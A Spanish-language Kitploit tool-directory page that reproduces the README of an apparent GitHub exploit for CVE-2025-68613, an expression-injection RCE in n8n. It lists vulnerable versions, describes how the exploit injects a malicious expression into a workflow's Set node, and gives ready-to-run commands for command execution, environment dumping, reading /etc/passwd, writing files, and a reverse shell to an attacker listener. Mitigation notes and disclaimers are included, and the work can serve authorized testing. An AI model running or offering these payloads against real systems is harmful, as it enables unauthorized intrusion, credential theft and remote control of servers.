Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
n8n-cve-2025-68613 — Exploit PoC de RCE autenticado y escáner de vulnerabilidades para CVE-2025-68613 en n8n. Admite ejecución de comandos, operaciones con archivos y payloads de shell inversa para pruebas de seguridad autorizadas. | Kitploit
Herramientas/GitHubGitHub/gagaltotal/n8n-cve-2025-68613
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y EducaciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubgagaltotal/n8n-cve-2025-68613

n8n-cve-2025-68613

Exploit PoC de RCE autenticado y escáner de vulnerabilidades para CVE-2025-68613 en n8n. Admite ejecución de comandos, operaciones con archivos y payloads de shell inversa para pruebas de seguridad autorizadas.

Ver RepositorioSitio web
14hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-68613 – Inyección de Expresiones en n8n RCE

Python Security CVE Status

Este repositorio proporciona scripts de escáner y PoC de explotación para la vulnerabilidad crítica CVE-2025-68613 que afecta a n8n Workflow Automation Platform.


ADVERTENCIA / AVISO

Español

Esta herramienta es SOLO para pruebas de seguridad AUTORIZADAS y LEGALES. Está prohibido usar esta herramienta en sistemas sin permiso del propietario.

Español

Esta herramienta es SOLO para pruebas de seguridad AUTORIZADAS y LEGALES. El uso no autorizado es ilegal y está prohibido.


Resumen de la Vulnerabilidad

  • CVE ID : CVE-2025-68613
  • Severidad : Crítica
  • CVSS : 10.0
  • Tipo : Inyección de Expresiones → Ejecución Remota de Código (RCE)
  • Producto : n8n Workflow Automation Platform

Versiones Vulnerables

  • 0.211.0 – 1.120.3
  • 1.121.0

Versiones Parcheadas

  • 1.120.4+
  • 1.121.1+
  • 1.122.0+

Estructura del Repositorio

.
├── tot-scanner-2025-68613.py   # Escáner de vulnerabilidad (sin explotación)
├── tot-exploit-2025-68613.py   # PoC de RCE autenticado
├── requirements.txt
└── README.md

Escáner (Sin Explotación)

El escáner se utiliza para:

  • Detectar el servicio n8n
  • Extraer la versión de n8n
  • Determinar el estado de vulnerabilidad
  • No realiza explotación
  • Soporta salida JSON

El escáner:

  • Detecta el servicio n8n
  • Extrae la versión de n8n
  • Determina el estado de vulnerabilidad
  • Sin explotación
  • Soporta salida JSON

El escáner verifica los siguientes endpoints:

  • /
  • /rest/settings
  • /healthz
  • /api/v1/health

Dependencias / Requisitos

Español

Paquetes necesarios:

  • requests

Contenido del archivo requirements.txt:

requests>=2.28.0

Español

Paquetes necesarios:

  • requests

Contenido del archivo requirements.txt:

requests>=2.28.0

Instalación

pip install -r requirements.txt

Uso del Escáner

python3 tot-scanner-2025-68613.py -u http://target.com:5678

Modo JSON del Escáner

python3 tot-scanner-2025-68613.py -u http://target.com:5678 --json

Ejemplo de Salida JSON del Escáner

{
  "target": "http://target.com:5678",
  "detected": true,
  "version": "1.121.0",
  "vulnerable": true,
  "status": "vulnerable",
  "cve": "CVE-2025-68613"
}

Códigos de Salida del Escáner

CódigoSignificado
0No vulnerable
1Versión desconocida
2Vulnerable

PoC de Explotación (RCE Autenticado)

Este exploit REQUIERE credenciales válidas de n8n
Se requiere acceso autenticado

El exploit funciona:

  1. Iniciando sesión en n8n
  2. Creando un workflow
  3. Insertando una expresión maliciosa en el nodo Set
  4. Ejecutando el workflow
  5. (Opcional) Limpiando el workflow

Argumentos del Exploit

ArgumentoRequeridoDescripción
-u / --url✅URL objetivo de n8n
-e / --email✅Correo electrónico de la cuenta n8n
-p / --password✅Contraseña de la cuenta n8n
--payload✅Tipo de payload
--command❌Comando del sistema (cmd)
--file❌Ruta del archivo (read/write)
--content❌Contenido del archivo (write)
--lhost❌IP del atacante (revshell)
--lport❌Puerto del atacante (revshell)
--verify-ssl❌Verificar certificado SSL

Payloads Soportados

PayloadFunción
infoInformación del sistema
cmdEjecución de comandos
envVolcado de entorno
readLeer archivo
writeEscribir archivo
revshellReverse shell

Captura de Pantalla

Ejemplos de Explotación

Información del Sistema

python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload info

Ejecución de Comandos

python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload cmd  --command "id"

Leer Archivo

python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload read  --file /etc/passwd

Escribir Archivo

python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload write  --file /tmp/pwned.txt  --content "owned"

Reverse Shell

nc -lvnp 4444
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload revshell  --lhost 10.10.14.5  --lport 4444

Mitigación

  • Actualizar n8n a versiones parcheadas
  • Restringir el acceso a los endpoints /rest/*
  • Implementar RBAC y autenticación fuerte
  • Auditar workflows desconocidos

Descargo de Responsabilidad

Este proyecto se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
El autor no se hace responsable del uso indebido.


Temas de GitHub

n8n
cve
cve-2025-68613
rce
expression-injection
security
pentest
red-team
blue-team
python

Manténgase legal. Manténgase ético.

Descargar herramienta